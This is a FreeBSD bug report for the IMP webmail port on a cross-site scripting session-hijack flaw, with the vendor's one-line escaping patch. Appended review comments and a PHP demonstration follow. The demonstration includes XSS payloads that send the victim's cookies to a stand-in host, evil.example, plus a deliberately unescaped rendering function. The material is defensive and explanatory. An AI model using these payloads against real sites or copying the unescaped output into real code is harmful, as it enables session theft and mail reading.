Date: Sat, 10 Nov 2001 01:55:54 +0100 (CET)
From: Thierry Thomas <thierry@thomas.as>
To: FreeBSD-gnats-submit@freebsd.org
Cc: Kris Kennaway <kris@freebsd.org>
Subject: ports/31889: Port mail/imp: security-update - webmail session hijacking vulnerability
Message-ID: <20011110005554.1F72C751E@graf.pompo.net>
>Number:         31889
>Category:       ports
>Synopsis:       Port mail/imp: security-update - webmail session hijacking vulnerability
>Confidential:   no
>Severity:       serious
>Priority:       high
>Responsible:    freebsd-ports
>State:          open
>Quarter:
>Keywords:
>Date-Required:
>Class:          maintainer-update
>Submitter-Id:   current-users
>Arrival-Date:   Fri Nov 09 17:00:02 PST 2001
>Closed-Date:
>Last-Modified:
>Originator:     Thierry Thomas
>Release:        FreeBSD 4.4-STABLE i386
>Organization:
Kabbale Eros
>Environment:
System: FreeBSD graf.pompo.net 4.4-STABLE FreeBSD 4.4-STABLE #0: Sat Sep 22 10:41:40 CEST 2001 root@graf.pompo.net:/usr/obj/mntsrc/src/sys/GRAF010429 i386
>Description:
- It's possible to hijack an imp/horde session using a cross-site scripting attack, quite similar to the one explored by Marc Slemko in his "Microsoft Passport to Trouble" paper.
- After hijacking the cookies, the attacker can use the session and read the victim's mail.
[Original mail from Joao Pedro Goncalves <megas@phibernet.org> - see CERT advisory on cross-site scripting http://www.cert.org/advisories/CA-2000-02.html ]
>How-To-Repeat:
Don't try to repeat it ;-)
>Fix:
The following patch has been issued by the Horde team:
diff -urN imp.orig/Makefile imp/Makefile --- imp.orig/Makefile Sat Oct 13 23:48:59 2001 +++ imp/Makefile Sat Nov 10 01:37:34 2001 @@ -8,7 +8,7 @@ PORTNAME= imp PORTVERSION= 2.2.6 -PORTREVISION= 1 +PORTREVISION= 2 CATEGORIES= mail www MASTER_SITES= ftp://ftp.horde.org/pub/imp/tarballs/ diff -urN imp.orig/files/patch-aa imp/files/patch-aa --- imp.orig/files/patch-aa Thu Jan 1 01:00:00 1970 +++ imp/files/patch-aa Sat Nov 10 01:31:29 2001
@@ -0,0 +1,23 @@ +--- status.php3.orig Mon Nov 13 22:35:30 2000 ++++ status.php3 Sat Nov 10 01:26:38 2001 +@@ -4,9 +4,9 @@ + + File: status.php3 + $Author: chuck $ +- $Revision: 2.7.2.22 $ +- $Date: 2000/11/13 21:35:30 $ +- ++ $Revision: 2.7.2.23 $ ++ $Date: 2001/11/09 16:47:06 $ ++ + IMP: Copyright 1998, 1999, 2000 by Charles J. Hagenbuch <chuck@horde.org> + + You should have received a copy of the GNU Public +@@ -45,6 +45,7 @@ + page_close(); + if (isset($imp)) $imp->unpickle(); + $title = $lang->status_title; ++$message = htmlspecialchars($message); + + /* doctype */ + require "$default->include_dir/doctype.inc";
>Release-Note:
>Audit-Trail:
>Unformatted:
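Review bot: the Makefile hunk only bumps PORTREVISION from 1 to 2, while the actual fix lives in files/patch-aa, which the `--- imp.orig/files/patch-aa Thu Jan 1 01:00:00 1970` header shows is a brand-new file; make sure the new file is added to the repository in the same commit as the revision bump, otherwise the bump ships an unchanged port and users get a rebuilt but still vulnerable package.

Review bot: the single functional line in patch-aa, `+$message = htmlspecialchars($message);`, relies on the default flags, which escape `&`, `<`, `>` and double quotes but leave single quotes alone, so it is only sufficient if every place that later emits $message does so as element text or inside a double-quoted attribute; if doctype.inc or anything after it puts $message in a single-quoted attribute or a script block, `htmlspecialchars($message, ENT_QUOTES)` is the safer form. Note also that the escaping is inserted after `page_close()` and `$imp->unpickle()`, so anything output before line 45 would still see the raw value; the `$Revision`/`$Date` keyword changes in the first inner hunk are CVS noise and harmless.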
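The attack the PR describes, and the effect of the one-line fix, as an added illustration that is not part of this PR or of the IMP code base. The parameter name, the render_* helpers, the evil.example host and the payload strings are all constructed for the example; the PR does not show where IMP reads $message from or how the page emits it.

```php
<?php
// Added example, not part of the PR or of IMP. It shows what an unescaped
// status message does once a browser renders it, and what the patch's
// htmlspecialchars() call changes. Run with: php xss_status.php

// Constructed attacker-controlled value. Think of it as arriving through a
// request parameter such as ?message=... (hypothetical name). The payload
// sends the victim's cookies, i.e. the webmail session, to the attacker.
$message = "Mailbox not found"
    . "<script>document.location='http://evil.example/c?'+document.cookie</script>";

// BEFORE: the value is dropped into the page as-is, so the browser runs it.
function render_vulnerable($message)
{
    return "<p class=\"status\">$message</p>";
}

// AFTER, as in the PR's patch-aa: escape once where the value enters the page.
// ENT_COMPAT is passed explicitly because it was the default in 2001-era PHP;
// since PHP 8.1 the default flags also escape single quotes.
function render_patched($message)
{
    $message = htmlspecialchars($message, ENT_COMPAT);
    return "<p class=\"status\">$message</p>";
}

// Stricter variant: ENT_QUOTES also turns ' into &#039;, which matters if the
// value ever lands inside a single-quoted attribute.
function render_hardened($message)
{
    $message = htmlspecialchars($message, ENT_QUOTES);
    return "<p class=\"status\">$message</p>";
}

// Crude check used below: is there still a tag the browser would parse?
function contains_live_tag($html)
{
    return preg_match('/<\s*script\b/i', $html) === 1;
}

foreach (['render_vulnerable', 'render_patched', 'render_hardened'] as $fn) {
    $html = $fn($message);
    printf("%-17s live <script>: %-3s %s\n",
        $fn, contains_live_tag($html) ? 'yes' : 'no', $html);
}

// Where ENT_COMPAT is not enough: the escaped value inside a single-quoted
// attribute. The constructed value closes the attribute and adds a handler;
// the browser decodes &quot; inside the attribute, so the handler still works.
$attr = "Inbox' onmouseover='document.location=\"http://evil.example/c?\"+document.cookie";
echo "\nENT_COMPAT : <a title='" . htmlspecialchars($attr, ENT_COMPAT) . "'>\n";
echo "ENT_QUOTES : <a title='" . htmlspecialchars($attr, ENT_QUOTES) . "'>\n";
```

The first three lines of output show the `<script>` tag surviving only in the vulnerable rendering; the last two show why the patch's default flags are a narrower fix than ENT_QUOTES: with ENT_COMPAT the single quote is left in place and the constructed value escapes the attribute. Escaping at the point the value is written into the page, as the patch does, is the right shape of fix; choosing the flag set for every context the value can reach is the part a reviewer has to verify by reading the rest of status.php3 and the files it includes.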